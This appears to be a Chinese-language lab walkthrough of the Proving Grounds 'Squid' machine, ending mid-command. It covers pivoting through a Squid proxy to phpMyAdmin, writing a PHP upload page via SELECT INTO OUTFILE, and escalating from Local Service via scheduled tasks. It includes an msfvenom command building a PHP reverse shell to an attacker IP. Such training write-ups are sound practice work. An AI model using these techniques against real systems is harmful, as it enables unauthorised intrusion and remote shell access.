發表文章

目前顯示的是有「local Service Privilege」標籤的文章

Proving Grounds Practice : Squid Walkthrough

圖片
 Proving Grounds Practice : Squid Walkthrough Foothole (立足點 ) : 枚舉一輪後啥都沒發現,只有一個 Squid 且版本也沒有任何 RCE 與可利用的地方 透過 spose.py 指定 Squid Proxy 掃靶機本身有無其他服務,發現 phpmyadmin Select 語法搭配 into outfile 寫入可以上傳檔案的 php 網頁 上傳自行建立的 payload 後獲取 reverse shell PE ( 提權 ) : whoami 是 local service 權限,依據文章確認可以建立 Schedule Task Schedule Task 建立一個新的 Reverse shell 發現有預設的相關權限 再依據文章的說明要求 ScheduledTaskPrincipal 權限拿一個新的 Reverse Shell 標準作業提升權限後拿到管理者 注意事項 :  看到 Squid 要想到可以利用的服務,可能無法從外部存取而是跑在 127.0.0.1 loop back 上 可以先用 python code 掃 port 然後透過 Browser 探勘 學習 phpmyadmin 如何用 Select 語法然後 into outfile 塞入一個可以上傳檔案的 php 網頁 這是 Windows 環境,預設 kali 內建的 php-reverse-shell.php 是 Unix 環境使用 可以自己建立 payload -->  msfvenom -p php/reverse_php LHOST=192.168.45.201 LPORT=4444 -f raw -o php-reverse-shell.php localservice 提權好網站  https://itm4n.github.io/localservice-privileges/#sorry-no-impersonation-privileges-for-you Kali IP : 192.168.45.201 靶機 IP : 192.168.194.189 第一步 Rustscan, └─$ rustscan -a 192.168.194.189 --scripts non...